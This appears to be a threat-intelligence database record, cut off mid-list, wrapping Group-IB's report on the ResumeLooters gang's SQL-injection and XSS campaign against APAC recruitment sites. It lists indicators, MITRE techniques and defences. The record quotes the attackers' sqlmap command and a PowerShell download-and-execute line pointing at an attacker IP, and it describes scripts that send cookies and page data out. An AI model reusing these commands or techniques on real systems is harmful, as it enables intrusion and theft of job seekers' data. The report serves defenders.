{ "id": "2a7af2c5-6a42-4b0e-bacd-c7d0f096bcf0", "created_at": "2026-04-06T00:14:49.629408Z", "updated_at": "2026-04-10T13:11:34.675457Z", "deleted_at": null, "sha1_hash": "999a215477245a6b91cd3f9263228e9f7018a2a1", "title": "ResumeLooters infect websites in APAC | Group-IB Blog", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 765145, "plain_text": "Nikita Rostovcev\r\nAPAC Technical Head - ASM, TI \u0026 DRP\r\nDead-end job: ResumeLooters\r\ninfect websites in APAC through\r\nSQL injection and XSS attacks\r\nResumeLooters gang infects websites with XSS scripts and SQL injections to vacuum up job\r\nseekers' personal data and CVs\r\nFebruary 6, 2024 · min to read · Threat Intelligence\r\n← Blog\r\nhttps://www.group-ib.com/blog/resumelooters/\r\nPage 1 of 26\n\nAPAC Personal data Threat Intelligence Web injection\r\nIntroduction\r\nIn November 2023, Group-IB’s Threat Intelligence unit detected a massive malicious campaign\r\ntargeting employment agencies and retail companies primarily located in the APAC region, to\r\nsteal and sell sensitive user data.\r\nThe campaign was attributed to a previously unknown group. Due to the threat actor’s focus on\r\njob search platforms and the theft of resumes, Group-IB dubbed it ResumeLooters. Overall, the\r\nresearchers identified 65 websites compromised by ResumeLooters between November 2023 and\r\nDecember 2023. By using SQL injection attacks against websites, the threat actor attempts to steal\r\nuser databases that may include names, phone numbers, emails, and DOBs, as well as\r\ninformation about job seekers’ experience, employment history, and other sensitive personal\r\ndata. The stolen data is then put up for sale by the threat actor in Telegram channels, identified by\r\nGroup-IB’s Threat intelligence platform.\r\nGroup-IB researchers also found traces of Cross-Site Scripting (XSS) infection on legitimate job\r\nsearch websites. The scripts were intended to load additional malicious scripts from the associated\r\nmalicious infrastructure and display phishing forms on legitimate resources. Based on the file\r\ncreation dates on the attackers’ servers, the earliest attacks trace back to the beginning of 2023.\r\nhttps://www.group-ib.com/blog/resumelooters/\r\nPage 2 of 26\n\nNotably, this is the second group described by Group-IB in less than 2 months that is conducting\r\nSQL injection attacks against companies in the Asia-Pacific region. In December 2023, Group-IB\r\npublished a report about GambleForce – an SQL injection gang that has carried out over 20\r\nattacks against websites in the region.\r\nJust like GambleForce, ResumeLooters primarily targets the Asia-Pacific – over 70% of known\r\nvictims are located in the region (India, Taiwan, Thailand, Vietnam and other countries as seen in\r\nthe below Figure 2). However, Group-IB also identified compromised companies in Brazil, the USA,\r\nTurkey, Russia, Mexico, Italy, and some other non-APAC countries. Group-IB sent notifications to\r\nthe identified victim companies so they could take all necessary steps to mitigate further damage.\r\nThis blog provides a detailed overview of ResumeLooters’ malicious infrastructure, campaigns,\r\ntools, and TTPs, particularly emphasizing the analysis of the gang’s XSS attacks in line with the\r\nMITRE ATT\u0026CK® framework. This post contains relevant indicators of compromise (IOCs) and\r\nrecommendations for corporate cybersecurity teams on how to better defend against SQL injection\r\nand XSS attacks.\r\nFigure 1. ResumeLooters’ malicious infrastructure\r\nKey Findings\r\nhttps://www.group-ib.com/blog/resumelooters/\r\nPage 3 of 26\n\nFigure 2. Distribution of ResumeLooters’ victims by country and sector\r\nDiscovered by Group-IB, ResumeLooters has been active since early 2023.\r\nBetween November and December 2023, the gang successfully conducted SQL injection and\r\nCross-Site Scripting (XSS) attacks against recruitment and retail websites in the Asia-Pacific region.\r\nThe gang is primarily focused on India (12 victims), Taiwan (10), Thailand (9), and Vietnam\r\n(7).\r\nBy using SQL injections, the group has stolen data from 65 websites. The stolen files contained\r\na total of 2,188,444 rows, of which 510,259 were user data stolen from job search websites.\r\nVarious penetration testing tools have been identified on the group’s malicious servers, including\r\nsqlmap, Acunetix, Beef Framework, X-Ray, Metasploit, ARL (Asset Reconnaissance\r\nLighthouse), and Dirsearch.\r\nThe group’s main initial vector is SQL injection via sqlmap. Another technique observed by\r\nGroup-IB in this campaign was the injection of XSS scripts into legitimate job search websites.\r\nThe analysis of stolen HTML files suggests that the malicious XSS script was executed on at\r\nleast four websites. Some HTML files reveal the presence of XSS script embedded in the HTML\r\ncode. The XSS script appears to have been executed on some devices with administrative\r\naccess.\r\nResumeLooters tried inserting XSS scripts into all possible web forms of the targeted websites,\r\nhoping they would display phishing forms to obtain admin credentials.\r\nThe accounts of the attackers and advertisements for the sale of compromised data were\r\ndiscovered in Chinese-speaking hacking-themed Telegram groups.\r\nhttps://www.group-ib.com/blog/resumelooters/\r\nPage 4 of 26\n\nInfection for profit\r\nInitially, when seeking to identify the specific method the threat actor used to steal the data from\r\nthe websites, we formulated two main hypotheses to test:\r\nThroughout the course of our research, we found several pieces of evidence supporting the first\r\nversion. The attackers’ server, among other pieces of stolen data, stored a file named\r\nAdminJobApprovalGrid.aspx_2023_11_23_02_02_39.html.\r\nFigure 3. Source code of one of the legitimate recruitment sites containing ResumeLooters’ XSS\r\nscript\r\nIn addition, within the root directories of two legitimate sites jobs[redacted].co and\r\nwork[redacted].com containing ResumeLooters’ XSS script, we discovered the following pieces of\r\ncode.\r\nInfection of vulnerable legitimate websites with an XSS script\r\nInfection of website administrators through a malicious plugin distributed within a narrow circle\r\nof developers.\r\nhttps://www.group-ib.com/blog/resumelooters/\r\nPage 5 of 26\n\nThis particular piece of code is a script tag that invokes an external script from the domain 8r[.]ae,\r\nwhich is controlled by cybercriminals and presumably used to store additional malicious scripts.\r\nOn one of the legitimate websites identified by Group-IB (https://jobs[redacted]co/company-detail/248), the attackers created a fake employer profile. Within one of the fields in this profile,\r\nResumeLooters were able to inject the XSS script referencing 8r[.]ae, which is also displayed on the\r\nmain page of the site.\r\nFigure 4. Screenshot of a fake company card created by the attackers for distributing malicious\r\nXSS script\r\nThis profile also included a link to admin.cloudnetsafe[.]com, which we believe could be another\r\ndomain associated with the group. But the website was inaccessible at the time of our research and\r\nwe were not able to retrieve its content.\r\nThe latter appears to be an almost exact copy of the main malicious domain associated with\r\nResumeLooters admin.cloudnetsofe[.]com with the difference being only one letter in the URL.\r\nadmin.cloudnetsofe[.]com hosts some malicious scripts as well as phishing pages intended for\r\ncredential theft. This domain will be analyzed in detail later in the blog.\r\nThe XSS script was also found on some other websites.\r\nMalicious XSS script discovered on jobs[redacted].co and\r\nwork[redacted].com arrow_drop_down\r\nhttps://www.group-ib.com/blog/resumelooters/\r\nPage 6 of 26\n\nIn another instance, we identified a fake CV posted by the threat actor containing an injected XSS\r\nscript.\r\nFigure 5.1 Other websites compromised by ResumeLooters contained identical pieces of malicious\r\nXSS script\r\nhttps://www.group-ib.com/blog/resumelooters/\r\nPage 7 of 26\n\nFigure 6. Fake CV posted by ResumeLooters contained the same injected XSS script (The contents\r\nof the CV were translated into English by Group-IB)\r\nThe presence of this code on these pages does not necessarily imply that it was executed on every\r\ndevice. However, it does indicate the persistence of the attackers and their attempts to inject their\r\nXSS scripts into all possible input fields on the targeted websites. Group-IB has also found\r\nevidence that the XSS script was executed on some of the visitors’ devices.\r\nhttps://www.group-ib.com/blog/resumelooters/\r\nPage 8 of 26\n\nInvestigation into ResumeLooters’ malicious\r\ninfrastructure and tools\r\n139.180.137[.]107\r\nGroup-IB’s investigation began with the identification of a malicious server at 139.180.137[.]107. On\r\nthis server, we found logs of several penetration testing tools, including sqlmap. According to these\r\nlogs, the attackers focused extensively on attacks targeting employment websites and retail\r\ncompanies. Although sqlmap commands were not unique, the following commands caught our\r\nattention:\r\npython3 sqlmap.py -r txt/redacted.txt -p employee_id --risk 3 --level 3 --batch -D app -T\r\nAnd its subsequent execution:\r\npowershell.exe -nop -w hidden -c IEX ((new-object\r\nNet.WebClient).DownloadString('http://139.84.130[.]232:8080/CcrN3QqWOeRx/KAGctYUci'));I\r\n((new-object\r\nNet.WebClient).DownloadString('http://139.84.130[.]232:8080/CcrN3QqWOeRx/iDDHJOuzw/1\r\n((new-object\r\nNet.WebClient).DownloadString('http://139.84.130[.]232:8080/CcrN3QqWOeRx'));\r\nThis sequence suggests that in some cases, ResumeLooters were also attempting to gain shell\r\naccess on the target system to download and execute additional payloads and try to find more data\r\nwhile having full control of the victims’ targeted server. It’s not known if these attempts were\r\nsuccessful.\r\nUpon a detailed examination of the server, additional ports with services were discovered. One of\r\nthem, port 443, hosted the following script at the root of its page:\r\nhttps://www.group-ib.com/blog/resumelooters/\r\nPage 9 of 26\n\nFigure 7. Scan results for 139.180.137[.]107\r\nThe link in this script downloads the data from the sb8[.]co, one of the malicious servers used by\r\nResumeLooters. The root page of this site contains three additional links.\r\nFigure 8. Scan results for sb8[.]co\r\nYou can find more details about the intended functions of each of these scripts below.\r\nContent of http://admin.cloudnetsofe[.]com/ (139.180.137[.]107)\r\nroot page arrow_drop_down\r\nContent of sb8[.]co root page arrow_drop_down\r\nhttps://www.group-ib.com/blog/resumelooters/\r\nPage 10 of 26\n\nOnline.htm\r\nThis JavaScript script represents malicious code that loads the jQuery library (jquery3.6.3.js) from\r\nhttps://sb8[.]co. After downloading the library, the script uses the html2canvas library to capture a\r\nscreenshot of the current web page and convert it into a PNG format.\r\nSubsequently, the image is encoded into a data string (Base64) and sent via a POST request to\r\nanother server controlled by the attackers at https://api.qu3[.]cc/?js=sb8[.]co. Along with the\r\nimage, various confidential data is sent, such as the HTML code of the page, data from the local\r\nand session storage of the browser, as well as information about the host, cookies, and\r\nreferrer. It is not known why the threat actor selected such an unconventional method of\r\ntransmitting the data.\r\nBeef Framework\r\nThe root page of the sb8[.]co website also mentions 139.84.168[.]189:3000/jquery.js, which upon\r\nanalysis turned out to be part of the Beef Framework.\r\nBeef (Browser Exploitation Framework) is a penetration testing tool designed for interacting with\r\nweb browsers. This framework is used by penetration testing professionals to analyze browser\r\nvulnerabilities and conduct client-side attacks. Beef provides a wide range of exploits targeting\r\nvulnerabilities in web browsers and their plugins. The framework allows to gain complete control\r\nover the victim’s browser, enabling the attacker to perform various actions on behalf of the user.\r\nResumeLooters utilized the Beef framework to facilitate XSS attacks.\r\nIf.js\r\nContent of https://sb8[.]co/online.htm arrow_drop_down\r\nhttps://www.group-ib.com/blog/resumelooters/\r\nPage 11 of 26\n\nFigure 9. Scan results for https://admin.cloudnetsofe[.]com/if.js\r\nif.js is a malicious JavaScript code that gathers user information and performs redirects to phishing\r\ncredential collection forms.\r\nThe JavaScript code was designed to display tailored phishing collection forms on websites with\r\nsuccessfully injected XSS scripts aiming to collect visitors’ credentials. We believe that the\r\ncybercriminals’ main goal was to steal administrators’ credentials. However, no evidence of\r\nsuccessful theft of admin credentials was found.\r\nNonetheless, by successfully executing the XSS script on some devices, ResumeLooters were able\r\nto collect some HTML files from users with admin access by utilizing Online.htm described earlier.\r\nContent of https://admin.cloudnetsofe[.]com/if.js arrow_drop_down\r\nhttps://www.group-ib.com/blog/resumelooters/\r\nPage 12 of 26\n\nThe key functions of the if.js script include:\r\nThe phishing pages hosted on https://admin[.]cloudnetsofe[.]com follow the same naming pattern:\r\nhttps://admin.cloudnetsofe[.]com/{redacted}/index[.]html\r\nOther tools\r\nThe attackers’ server was hosting other open-source tools such as Metasploit, Dirsearch, and X-Ray. In addition to these well-known pentesting tools, we also discovered self-written scripts\r\ndesigned to connect to targeted websites and parse the available data.\r\nThe script monitors visits to specific websites with injected XSS script and redirects to phishing\r\npages of these sites in case of a match to collect credentials from these sites.\r\nThe script contains a function named “xss,” which creates a hidden iframe with a white\r\nbackground and loads the specified URL into it. This can be used for conducting XSS attacks,\r\nparticularly to display malicious web pages on top of legitimate ones.\r\nSend the current URL and user cookies to an external server\r\n(https://admin.cloudnetsofe[.]com/domainxxdisdiiskshfdsh[.]php) using a POST request.\r\nFigure 10.1 Examples of phishing forms in various languages hosted on\r\nhttps://admin.cloudnetsofe[.]com\r\nhttps://www.group-ib.com/blog/resumelooters/\r\nPage 13 of 26\n\nWe have no evidence of how the attackers obtained the necessary session data for data parsing on\r\nthese websites, but using this method the attackers were able to parse data from at least a couple\r\nof job search sites and a delivery site.\r\nA script was also discovered parsing data from a server, which appears to be the backend of one of\r\nthe mobile games, judging by the names of some of the data fields.\r\nFigure 11.1 ResumeLooters’ custom scripts designed for data parsing\r\nhttps://www.group-ib.com/blog/resumelooters/\r\nPage 14 of 26\n\nhttps://www.group-ib.com/blog/resumelooters/\r\nPage 15 of 26\n\nFigure 12. Data found within the ResumeLooters’ custom data parser related to an unidentified\r\nvictim in the gaming industry\r\n139.84.168[.]189\r\n139.84.168[.]189 is an IP address that was mentioned earlier and is associated with ResumeLooters’\r\nmalicious activity.\r\nPort 3443\r\nOn port 3443 of this server, a penetration testing framework Acunetix was discovered. Acunetix is a\r\ntool used for scanning web applications to identify security vulnerabilities.\r\nhttps://www.group-ib.com/blog/resumelooters/\r\nPage 16 of 26\n\nFigure 13. Login page to the Acunetix framework found on of the gang’s servers\r\nPort 3000\r\nOn port 3000, this server hosted another penetration testing framework, Beef Framework, which\r\nwas described earlier.\r\nStolen data\r\nAdditionally, the server controlled by ResumeLooters contained an open directory where\r\ncybercriminals stored the stolen source code pages (HTML), cookies, and additional data about\r\nvictims compromised by using sqlmap. Apparently, the threat actor failed to disable the directory\r\nlisting on a web server, which resulted in the exposure of this information.\r\nIn the collection of HTML files, there were documents revealing administrator access to some of the\r\nwebsites that were injected with XSS scripts. Moreover, in some HTML files related to four websites,\r\nwhere the threat actor was able to implant malicious XSS scripts. This suggests that some of the\r\nXSS scripts were executed on the victim’s side and sent to the attackers’ server.\r\nhttps://www.group-ib.com/blog/resumelooters/\r\nPage 17 of 26\n\nFigure 14. Opendir on 139.84.168[.]189\r\nPenetration Data Center — 渗透数据中心 —\r\nsale of the stolen data\r\nhttps://www.group-ib.com/blog/resumelooters/\r\nPage 18 of 26\n\nOne of the main goals in any threat research is to understand the ultimate goal and motivation of\r\nthe attackers.\r\nThanks to Group-IB’s Threat Intelligence platform and the analysis of the discovered malicious\r\nserver, we traced Telegram accounts associated with the attackers using the email address\r\nemployed by ResumeLootersin their campaign.\r\nThe attackers have been using at least two Telegram accounts, one of which, as of January 2023,\r\nwas named “渗透数据中心,” translated as “Penetration Data Center” from Simplified Chinese.\r\nFigure 15. The history of the username 渗透数据中心 changes on Telegram. Source: Group-IB Threat\r\nIntelligence\r\nhttps://www.group-ib.com/blog/resumelooters/\r\nPage 19 of 26\n\nFigure 16. Messages from the username with sender ID 1757750719. Source: Group-IB Threat\r\nIntelligence\r\nStarting in the fall of 2023, attackers began using another account named “万国数据阿力” which\r\ntranslates to “World Data Ali.”\r\nhttps://www.group-ib.com/blog/resumelooters/\r\nPage 20 of 26\n\nFigure 17. Messages from the username with sender ID 5833110993. Source: Group-IB Threat\r\nIntelligence\r\nBoth accounts were found to be selling data from recruitment and other websites, and the content\r\nof their posts is identical. Furthermore, both accounts joined groups focused on hacking and\r\npenetration testing.\r\nConclusion\r\nSince the beginning of 2023, ResumeLooters have been able to compromise at least 65 websites.\r\nThe group employs a variety of simple techniques, including SQL injection and XSS. The threat\r\nactor attempted to insert XSS scripts into all available forms, aiming to execute it on the\r\nadministrators’ device to obtain admin credentials. While the group was able to execute the XSS\r\nscript on some visitors’ devices with administrative access, allowing ResumeLooters to steal the\r\nHTML code of the pages the victims were visiting, Group-IB did not find any confirmation of admin\r\ncredential thefts.\r\nResumeLooters is yet another example of how much damage can be made with just a handful of\r\npublicly available tools. These attacks are fueled by poor security as well as inadequate database\r\nand website management practices. Both GambleForce and ResumeLooters employ very\r\nstraightforward attack methods. Their attacks are easily avoidable. This newly discovered malicious\r\ncampaign serves as a reminder of the need for organizations to prioritize cybersecurity and stay\r\nvigilant against evolving threats.\r\nAside from the potential exposure of job seekers’ data (including phone numbers, email addresses,\r\nand other personal information), various APT groups could leverage this information for the further\r\ntargeting of specific individuals. For example, the Lazarus group and their infamous DreamJob\r\noperation targeted hundreds of job seekers worldwide with fake job offers designed to steal their\r\npersonal information and login credentials.\r\nWe will continue monitoring the activity of ResumeLooters and will provide updates as they become\r\navailable.\r\nRecommendations\r\nhttps://www.group-ib.com/blog/resumelooters/\r\nPage 21 of 26\n\nSQL Injection Prevention\r\nCross-Site Scripting (XSS) Prevention\r\nEnable Advanced Protection with Group-IB\r\nSQL injections and Cross-Site Scripting (XSS) attacks are among the oldest and most threatening\r\nvulnerabilities to modern web applications. They persistently appear in the OWASP Top 10 – a list of\r\ntop critical web application security risks today. These attacks can have serious consequences,\r\nincluding data theft, data loss, compromised data integrity, denial of service, and even complete\r\nsystem compromise.\r\nGroup-IB’s Penetration Testing services can help you minimize your susceptibility to such attacks.\r\nOur experts work with 40 automated tools, incorporating the latest methods and techniques\r\ncurated by Group-IB Threat Intelligence to pinpoint assets vulnerable to web injection attacks, and\r\nmore.\r\nUse Parameterized Statements or Prepared Statements:\r\nInstead of concatenating user input directly into SQL queries, use parameterized\r\nstatements or prepared statements provided by your programming language or\r\nframework. This helps to separate user input from SQL code.\r\nInput Validation:\r\nValidate and sanitize user inputs on both the client and server sides. Ensure that inputs\r\nadhere to expected formats and length constraints.\r\nWeb Application Firewalls (WAF):\r\nImplement a WAF that can detect and block SQL injection attempts. WAFs can provide an\r\nadditional layer of defense against various web application attacks.\r\nInput Validation and Sanitization:\r\nValidate and sanitize user input on both the client and server sides. Input validation\r\nensures that user input adheres to expected formats, while sanitization helps to neutralize\r\npotentially harmful content.\r\nEscape User-Generated Content:\r\nBefore rendering user-generated content, escape special characters to ensure that they\r\nare treated as literal text and not interpreted as code.\r\nhttps://www.group-ib.com/blog/resumelooters/\r\nPage 22 of 26\n\nIn the contemporary cybersecurity landscape, injection attacks are often automated using malicious\r\nbots. Group-IB Fraud Protection solution takes a proactive stance to counter this evolving attack\r\ntechnique. Its AI creates highly accurate user behavior profiles, distinguishing between genuine\r\nuser interactions and activities initiated by a third party, such as a fraudster or a sophisticated bot.\r\nThis enables the identification and blocking of bad bot activity.\r\nWith a range of proactive and reactive technologies and services, choose an effective cyber stack\r\nto protect your business-critical applications with the assistance of Group-IB’s experts.\r\nSupercharge cybersecurity with\r\nGroup-IB Threat Intelligence\r\nDefeat threats efficiently and identify attackers proactively with a revolutionary cyber\r\nthreat intelligence platform by Group-IB\r\nNetwork Indicators\r\nIPs Domains Malicious URLs\r\n139.84.130[.]232\r\nRecruit.iimjobs[.]asia\r\nrecruiter.foundit[.]asia\r\nhttp://139.84.130[.]232:8080/CcrN3QqWOeRx/iDDHJ\r\nhttp://139.84.130[.]232:8080/CcrN3QqWOeRx/KAGct\r\nhttp://139.84.130[.]232:8080/CcrN3QqWOeRx\r\n139.84.168[.]189\r\nRequest a demo\r\nhttps://www.group-ib.com/blog/resumelooters/\r\nPage 23 of 26\n\n139.84.62[.]151\r\n173.199.122[.]65\r\n139.180.137[.]107 admin.cloudnetsofe[.]com http://139.180.137[.]107:9932/shell3.exe\r\n8t[.]ae\r\nsb8[.]co\r\nq 3[ ]cc\r\nMITRE ATT\u0026CK®\r\nTactic Name-ID Description\r\nActive\r\nScanning\r\nVulnerability Scanning:\r\nT1595.002\r\nThe ResumeLooters group used X-Ray,\r\nAcunetix vulnerability scanners in order to find\r\nand execute vulnerabilities\r\nActive\r\nScanning\r\nWordlist Scanning:\r\nT1595.003\r\nThe ResumeLooters group used Dirsearch in\r\norder to find all available files and directories on\r\nthe target web-site\r\nAcquire\r\nInfrastructure\r\nDomains: T1583.001\r\nThe ResumeLooters group used differents\r\ndomain names for their malicious purposes\r\nAcquire\r\nInfrastructure\r\nServer: T1583.004\r\nThe ResumeLooters group used differents\r\nservers for their malicious purposes\r\nInitial Access\r\nDrive-by Compromise:\r\nT1189\r\nThe ResumeLooters group infected legitimate\r\nwebsites with XSS scripts\r\nE l it P bli F i Th R L t l it d SQL\r\nhttps://www.group-ib.com/blog/resumelooters/\r\nPage 24 of 26\n\nShare this article\r\nFound it interesting? Don't hesitate to share it to wow your friends or colleagues\r\nResources\r\nResearch Hub\r\nSuccess Stories\r\nKnowledge Hub\r\nCertificates\r\nWebinars\r\nPodcasts\r\nTOP Investigations\r\nRansomware Notes\r\nAI Cybersecurity Hub\r\nProducts\r\nThreat Intelligence\r\nFraud Protection\r\nManaged XDR\r\nAttack Surface Management\r\nDigital Risk Protection\r\nBusiness Email Protection\r\nCyber Fraud Intelligence\r\nPlatform\r\nUnified Risk Platform\r\nIntegrations\r\nPartners\r\nPartner Program\r\nMSSP and MDR Partner\r\nProgram\r\nTechnology Partners\r\nPartner Locator\r\nCompany\r\nAbout Group-IB\r\nTeam\r\nCERT-GIB\r\nCareers\r\nhttps://www.group-ib.com/blog/resumelooters/\r\nPage 25 of 26\n\nInternship\r\nAcademic Aliance\r\nSustainability\r\nMedia Center\r\nContact\r\nAPAC: +65 3159 3798\r\nEU \u0026 NA: +31 20 226 90 90\r\nMEA: +971 4 568 1785\r\ninfo@group-ib.com\r\n© 2003 – 2026 Group-IB is a global leader in the fight against cybercrime, protecting customers\r\naround the world by preventing breaches, eliminating fraud and protecting brands.\r\nTerms of Use Cookie Policy Privacy Policy\r\nSubscription plans Services Resource Center\r\nSubscribe to stay up to date with the\r\nlatest cyber threat trends\r\nContact\r\nhttps://www.group-ib.com/blog/resumelooters/\r\nPage 26 of 26", "extraction_quality": 1, "language": "EN", "sources": [ "MISPGALAXY", "Malpedia", "ETDA" ], "origins": [ "web" ], "references": [ "https://www.group-ib.com/blog/resumelooters/" ], "report_names": [ "resumelooters" ], "threat_actors": [ { "id": "34eea331-d052-4096-ae03-a22f1d090bd4", "created_at": "2025-08-07T02:03:25.073494Z", "updated_at": "2026-04-10T02:00:03.709243Z", "deleted_at": null, "main_name": "NICKEL ACADEMY", "aliases": [ "ATK3 ", "Black Artemis ", "COVELLITE ", "CTG-2460 ", "Citrine Sleet ", "Diamond Sleet ", "Guardians of Peace", "HIDDEN COBRA ", "High Anonymous", "Labyrinth Chollima ", "Lazarus Group ", "NNPT Group", "New Romanic Cyber Army Team", "Temp.Hermit ", "UNC577 ", "Who Am I?", "Whois Team", "ZINC " ], "source_name": "Secureworks:NICKEL ACADEMY", "tools": [ "Destover", "KorHigh", "Volgmer" ], "source_id": "Secureworks", "reports": null }, { "id": "8d1c3575-c954-4e39-8717-8d15ccd4020e", "created_at": "2024-01-18T02:02:34.725883Z", "updated_at": "2026-04-10T02:00:05.007755Z", "deleted_at": null, "main_name": "GambleForce", "aliases": [], "source_name": "ETDA:GambleForce", "tools": [ "Agentemis", "Cobalt Strike", "CobaltStrike", "Dirsearch", "Tinyproxy", "cobeacon", "redis-rogue-getshell", "sqlmap" ], "source_id": "ETDA", "reports": null }, { "id": "21a155e6-8952-49d3-b7bb-77f0e7541347", "created_at": "2024-03-08T02:02:15.765879Z", "updated_at": "2026-04-10T02:00:05.02743Z", "deleted_at": null, "main_name": "ResumeLooters", "aliases": [], "source_name": "ETDA:ResumeLooters", "tools": [], "source_id": "ETDA", "reports": null }, { "id": "e55fb744-4fb6-4b73-a326-d4d014d6a3d7", "created_at": "2023-12-21T02:00:06.102133Z", "updated_at": "2026-04-10T02:00:03.503718Z", "deleted_at": null, "main_name": "GambleForce", "aliases": [], "source_name": "MISPGALAXY:GambleForce", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "3c7567d8-0cac-4226-a6f7-d049b9abcb46", "created_at": "2024-02-22T02:00:03.770807Z", "updated_at": "2026-04-10T02:00:03.591198Z", "deleted_at": null, "main_name": "ResumeLooters", "aliases": [], "source_name": "MISPGALAXY:ResumeLooters", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "732597b1-40a8-474c-88cc-eb8a421c29f1", "created_at": "2025-08-07T02:03:25.087732Z", "updated_at": "2026-04-10T02:00:03.776007Z", "deleted_at": null, "main_name": "NICKEL GLADSTONE", "aliases": [ "APT38 ", "ATK 117 ", "Alluring Pisces ", "Black Alicanto ", "Bluenoroff ", "CTG-6459 ", "Citrine Sleet ", "HIDDEN COBRA ", "Lazarus Group", "Sapphire Sleet ", "Selective Pisces ", "Stardust Chollima ", "T-APT-15 ", "TA444 ", "TAG-71 " ], "source_name": "Secureworks:NICKEL GLADSTONE", "tools": [ "AlphaNC", "Bankshot", "CCGC_Proxy", "Ratankba", "RustBucket", "SUGARLOADER", "SwiftLoader", "Wcry" ], "source_id": "Secureworks", "reports": null }, { "id": "a2b92056-9378-4749-926b-7e10c4500dac", "created_at": "2023-01-06T13:46:38.430595Z", "updated_at": "2026-04-10T02:00:02.971571Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "Operation DarkSeoul", "Bureau 121", "Group 77", "APT38", "NICKEL GLADSTONE", "G0082", "COPERNICIUM", "Moonstone Sleet", "Operation GhostSecret", "APT 38", "Appleworm", "Unit 121", "ATK3", "G0032", "ATK117", "NewRomanic Cyber Army Team", "Nickel Academy", "Sapphire Sleet", "Lazarus group", "Hastati Group", "Subgroup: Bluenoroff", "Operation Troy", "Black Artemis", "Dark Seoul", "Andariel", "Labyrinth Chollima", "Operation AppleJeus", "COVELLITE", "Citrine Sleet", "DEV-0139", "DEV-1222", "Hidden Cobra", "Bluenoroff", "Stardust Chollima", "Whois Hacking Team", "Diamond Sleet", "TA404", "BeagleBoyz", "APT-C-26" ], "source_name": "MISPGALAXY:Lazarus Group", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "32a223a8-3c79-4146-87c5-8557d38662ae", "created_at": "2022-10-25T15:50:23.703698Z", "updated_at": "2026-04-10T02:00:05.261989Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "Lazarus Group", "Labyrinth Chollima", "HIDDEN COBRA", "Guardians of Peace", "NICKEL ACADEMY", "Diamond Sleet" ], "source_name": "MITRE:Lazarus Group", "tools": [ "RawDisk", "Proxysvc", "BADCALL", "FALLCHILL", "WannaCry", "MagicRAT", "HOPLIGHT", "TYPEFRAME", "Dtrack", "HotCroissant", "HARDRAIN", "Dacls", "KEYMARBLE", "TAINTEDSCRIBE", "AuditCred", "netsh", "ECCENTRICBANDWAGON", "AppleJeus", "BLINDINGCAN", "ThreatNeedle", "Volgmer", "Cryptoistic", "RATANKBA", "Bankshot" ], "source_id": "MITRE", "reports": null }, { "id": "f32df445-9fb4-4234-99e0-3561f6498e4e", "created_at": "2022-10-25T16:07:23.756373Z", "updated_at": "2026-04-10T02:00:04.739611Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "APT-C-26", "ATK 3", "Appleworm", "Citrine Sleet", "DEV-0139", "Diamond Sleet", "G0032", "Gleaming Pisces", "Gods Apostles", "Gods Disciples", "Group 77", "Guardians of Peace", "Hastati Group", "Hidden Cobra", "ITG03", "Jade Sleet", "Labyrinth Chollima", "Lazarus Group", "NewRomanic Cyber Army Team", "Operation 99", "Operation AppleJeus", "Operation AppleJeus sequel", "Operation Blockbuster: Breach of Sony Pictures Entertainment", "Operation CryptoCore", "Operation Dream Job", "Operation Dream Magic", "Operation Flame", "Operation GhostSecret", "Operation In(ter)caption", "Operation LolZarus", "Operation Marstech Mayhem", "Operation No Pineapple!", "Operation North Star", "Operation Phantom Circuit", "Operation Sharpshooter", "Operation SyncHole", "Operation Ten Days of Rain / DarkSeoul", "Operation Troy", "SectorA01", "Slow Pisces", "TA404", "TraderTraitor", "UNC2970", "UNC4034", "UNC4736", "UNC4899", "UNC577", "Whois Hacking Team" ], "source_name": "ETDA:Lazarus Group", "tools": [ "3CX Backdoor", "3Rat Client", "3proxy", "AIRDRY", "ARTFULPIE", "ATMDtrack", "AlphaNC", "Alreay", "Andaratm", "AngryRebel", "AppleJeus", "Aryan", "AuditCred", "BADCALL", "BISTROMATH", "BLINDINGCAN", "BTC Changer", "BUFFETLINE", "BanSwift", "Bankshot", "Bitrep", "Bitsran", "BlindToad", "Bookcode", "BootWreck", "BottomLoader", "Brambul", "BravoNC", "Breut", "COLDCAT", "COPPERHEDGE", "CROWDEDFLOUNDER", "Castov", "CheeseTray", "CleanToad", "ClientTraficForwarder", "CollectionRAT", "Concealment Troy", "Contopee", "CookieTime", "Cyruslish", "DAVESHELL", "DBLL Dropper", "DLRAT", "DRATzarus", "DRATzarus RAT", "Dacls", "Dacls RAT", "DarkComet", "DarkKomet", "DeltaCharlie", "DeltaNC", "Dembr", "Destover", "DoublePulsar", "Dozer", "Dtrack", "Duuzer", "DyePack", "ECCENTRICBANDWAGON", "ELECTRICFISH", "Escad", "EternalBlue", "FALLCHILL", "FYNLOS", "FallChill RAT", "Farfli", "Fimlis", "FoggyBrass", "FudModule", "Fynloski", "Gh0st RAT", "Ghost RAT", "Gopuram", "HARDRAIN", "HIDDEN COBRA RAT/Worm", "HLOADER", "HOOKSHOT", "HOPLIGHT", "HOTCROISSANT", "HOTWAX", "HTTP Troy", "Hawup", "Hawup RAT", "Hermes", "HotCroissant", "HotelAlfa", "Hotwax", "HtDnDownLoader", "Http Dr0pper", "ICONICSTEALER", "Joanap", "Jokra", "KANDYKORN", "KEYMARBLE", "Kaos", "KillDisk", "KillMBR", "Koredos", "Krademok", "LIGHTSHIFT", "LIGHTSHOW", "LOLBAS", "LOLBins", "Lazarus", "LightlessCan", "Living off the Land", "MATA", "MBRkiller", "MagicRAT", "Manuscrypt", "Mimail", "Mimikatz", "Moudour", "Mydoom", "Mydoor", "Mytob", "NACHOCHEESE", "NachoCheese", "NestEgg", "NickelLoader", "NineRAT", "Novarg", "NukeSped", "OpBlockBuster", "PCRat", "PEBBLEDASH", "PLANKWALK", "POOLRAT", "PSLogger", "PhanDoor", "Plink", "PondRAT", "PowerBrace", "PowerRatankba", "PowerShell RAT", "PowerSpritz", "PowerTask", "Preft", "ProcDump", "Proxysvc", "PuTTY Link", "QUICKRIDE", "QUICKRIDE.POWER", "Quickcafe", "QuiteRAT", "R-C1", "ROptimizer", "Ratabanka", "RatabankaPOS", "Ratankba", "RatankbaPOS", "RawDisk", "RedShawl", "Rifdoor", "Rising 